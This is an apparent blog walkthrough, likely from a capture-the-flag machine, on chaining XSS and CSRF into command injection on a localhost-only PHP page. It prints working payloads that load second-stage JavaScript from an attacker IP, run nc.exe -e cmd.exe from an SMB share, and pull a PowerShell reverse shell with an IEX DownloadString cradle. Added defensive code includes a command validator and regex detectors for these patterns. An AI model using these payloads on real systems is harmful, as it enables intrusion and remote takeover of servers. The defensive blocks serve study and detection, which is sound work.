From XSS, CSRF and Command Injection to Reverse Shell

Hello Man,

I would like to share some knowledge on how to leverage one or two vulnerabilities you have found into a further step, so that you can maximize the impact of the attack.

In this scenario, I found two vulnerabilities in the page: one lets us inject JavaScript, and one lets us do command injection. But due to a constraint in the code, the command injection can only be triggered from localhost. So the attack is to inject JavaScript that POSTs the command injection on behalf of the current user's session.

The XSS payload has two stages: the first-stage code we inject only loads the second stage, which is the bigger payload.

Let's look at the first-stage XSS code:

<script src="http://10.10.14.7/java.js"></script>

Method 1 Command Injection

When the first payload is executed, it loads the java.js file from the attacker's IP. To let the browser fetch the second stage, you need to run a web server on the attacker machine that hosts it. Below is the second-stage payload.

// Stage 2 (java.js): POST the command injection to backdoorchecker.php
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "backdoorchecker.php", true);
// Form-encoded body so PHP populates $_POST['cmd'] (same header as in Method 2)
xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// "diras" is not a valid command, so cmd.exe runs the part after ||
xhttp.send("cmd=diras || \\\\10.10.14.7\\smb\\nc.exe -e cmd.exe 10.10.14.7 9090");

I use a Python module to run a simple HTTP server that hosts the second stage:

python -m SimpleHTTPServer 80

When the browser executes the above code as JavaScript, it sends a POST to backdoorchecker.php, the page with the command injection vulnerability. When the command injection is triggered, it runs nc.exe from the shared SMB directory.
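Why the localhost-only restriction does not hold against this chain, shown as an added example (not code from the original post): three checks a defender might put in front of backdoorchecker.php, evaluated against a legitimate admin request and against one built by injected script in the same browser. The request shape, the origin http://intranet.example, the command allowlist and the ATTACKER_IP placeholder are all assumptions of this example.

```javascript
// Added example, not from the original post: why "localhost only" does not
// protect backdoorchecker.php against a request forged by injected script,
// and which check actually does. Request shape, origin and allowlist are
// constructed for this illustration.

// Exact commands the page is allowed to run; everything else is refused.
const ALLOWED_COMMANDS = new Set(["dir", "whoami", "ipconfig"]);

// Metacharacters that let cmd.exe run a second command on the same line
// (the post's payloads ride on "||" and "|").
const SHELL_METACHARS = /[|&;`$<>\r\n]/;

// Check 1: the page's original control. Any request whose socket peer is the
// loopback interface passes, including one sent by the admin's own browser
// running on the same host.
function isFromLocalhost(req) {
  return req.remoteAddr === "127.0.0.1" || req.remoteAddr === "::1";
}

// Check 2: compare the Origin header with the site's origin. This stops
// classic cross-site CSRF, but script injected via XSS runs inside the site's
// own origin, so the browser sends the matching Origin and this passes too.
function isSameOrigin(req, siteOrigin) {
  return req.headers.origin === siteOrigin;
}

// Check 3: validate the value that reaches the shell. This holds regardless of
// who sent the request: a metacharacter or an unknown command is rejected
// before any process is spawned.
function validateCmd(cmd) {
  if (typeof cmd !== "string") return { ok: false, reason: "missing" };
  const trimmed = cmd.trim();
  if (SHELL_METACHARS.test(trimmed)) return { ok: false, reason: "metacharacter" };
  if (!ALLOWED_COMMANDS.has(trimmed)) return { ok: false, reason: "not-allowlisted" };
  return { ok: true, reason: "allowed" };
}

// Run all three checks and report which ones the request passed.
function evaluate(req, siteOrigin) {
  return {
    localhost: isFromLocalhost(req),
    sameOrigin: isSameOrigin(req, siteOrigin),
    cmd: validateCmd(req.body.cmd),
  };
}

const SITE_ORIGIN = "http://intranet.example"; // constructed origin

// Constructed sample: the admin runs "dir" from the site's own page.
const legitimateRequest = {
  remoteAddr: "127.0.0.1",
  headers: { origin: SITE_ORIGIN },
  body: { cmd: "dir" },
};

// Constructed sample: same browser, same origin, same peer address, but the
// body was built by injected script and appends a second command after "||".
const forgedRequest = {
  remoteAddr: "127.0.0.1",
  headers: { origin: SITE_ORIGIN },
  body: { cmd: "diras || \\\\ATTACKER_IP\\smb\\nc.exe" },
};

function demo() {
  return {
    legitimate: evaluate(legitimateRequest, SITE_ORIGIN),
    forged: evaluate(forgedRequest, SITE_ORIGIN),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Both the loopback check and the same-origin check pass for the forged request, because the script runs in the admin's own browser inside the site's origin; an anti-CSRF token would fare no better, since injected script can read it from the page. Only validating the cmd parameter (together with fixing the XSS itself) stops the chain.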

Method 2 PowerShell Reverse Shell

The second method uses the Nishang PowerShell reverse shell. We can modify the java.js script as below:

// Stage 2 (java.js), PowerShell variant
var xhttp = new XMLHttpRequest();
var url = '/admin/backdoorchecker.php';
// Injected command: download and run rev.ps1 from the attacker's web server
var param = 'cmd=dir| powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.7/rev.ps1\')"';
xhttp.open("POST", url, true);
// setRequestHeader (the original had requestHeader, which is not an XHR method)
xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhttp.send(param);

With the above script, the process has three stages: the first JavaScript payload loads the second-stage JavaScript payload, which finally downloads the Nishang PowerShell reverse TCP shell (rev.ps1).
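From the defender's side, both methods leave the same trace on the web server host: the web server process spawns cmd.exe or powershell.exe with a command line that either runs a binary off a UNC share (Method 1) or contains a download-and-run cradle (Method 2). The following added example (not from the original post) flags that chain over constructed process-creation events in a Sysmon-like shape; the field names ParentImage, Image and CommandLine, the process paths, and the ATTACKER_IP placeholder are assumptions of this example, not taken from any real capture.

```javascript
// Added example, not from the original post: flag the process chain that the
// post's two methods produce on the web server host. Events are constructed
// in a Sysmon-like shape; field names and paths are assumptions.

// Processes that serve web content and should never spawn a shell.
const WEB_SERVER_IMAGES = ["httpd.exe", "php-cgi.exe", "php.exe", "nginx.exe", "w3wp.exe"];
const SHELL_IMAGES = ["cmd.exe", "powershell.exe", "pwsh.exe"];

// Command-line indicators of the two stages in the post: an executable run
// from a UNC share (Method 1), a PowerShell download cradle (Method 2), and
// netcat with -e (the reverse shell itself).
const INDICATORS = [
  { name: "unc-executable", re: /\\\\[\w.-]+\\[^\s"']*\.exe\b/i },
  { name: "ps-download-cradle", re: /downloadstring|downloadfile|invoke-expression|\biex\b/i },
  { name: "netcat-reverse", re: /\bnc(64)?\.exe\b[^"]*\s-e\s/i },
];

// Last path component, lower-cased, so "C:\xampp\apache\bin\httpd.exe" -> "httpd.exe".
function baseName(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Score one event: a shell spawned by a web server plus any indicator is high;
// an indicator on its own is medium; nothing matched is none.
function flagProcessEvent(evt) {
  const webParent = WEB_SERVER_IMAGES.includes(baseName(evt.ParentImage));
  const shellChild = SHELL_IMAGES.includes(baseName(evt.Image));
  const findings = [];
  if (webParent && shellChild) findings.push("web-server-spawned-shell");
  for (const ind of INDICATORS) {
    if (ind.re.test(evt.CommandLine)) findings.push(ind.name);
  }
  let severity = "none";
  if (findings.length > 0) severity = webParent && shellChild ? "high" : "medium";
  return { severity, findings };
}

// Constructed sample events.
const SAMPLE_EVENTS = [
  // benign: the web server starting its normal PHP worker
  { ParentImage: "C:\\xampp\\apache\\bin\\httpd.exe", Image: "C:\\xampp\\php\\php-cgi.exe", CommandLine: "php-cgi.exe" },
  // Method 1: cmd.exe under the web server, running nc.exe off a share
  { ParentImage: "C:\\xampp\\apache\\bin\\httpd.exe", Image: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: "cmd.exe /c diras || \\\\ATTACKER_IP\\smb\\nc.exe -e cmd.exe ATTACKER_IP 9090" },
  // Method 2: PowerShell cradle under the PHP worker
  { ParentImage: "C:\\xampp\\php\\php-cgi.exe", Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')\"" },
  // a cradle-like command from an interactive session: worth a look, not a web shell
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell -c \"(New-Object Net.WebClient).DownloadString('http://intranet.example/update.ps1')\"" },
  // an admin opening a shell from the desktop: nothing to flag
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\cmd.exe", CommandLine: "cmd.exe" },
];

function scan(events = SAMPLE_EVENTS) {
  return events.map((evt, index) => ({ index, ...flagProcessEvent(evt) }));
}

console.log(JSON.stringify(scan(), null, 2));
```

The parent/child pairing is the strongest signal: a web server or PHP worker has no legitimate reason to start cmd.exe or powershell.exe, so that alone deserves an alert even if the command line is obfuscated and none of the regexes fire. Note also that the cmd parameter travels in the POST body, which a standard access log does not record, so process telemetry on the host is where this chain is most visible.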

Below is for your reference: the backdoorchecker.php page that has the command injection vulnerability but can only be invoked from localhost.
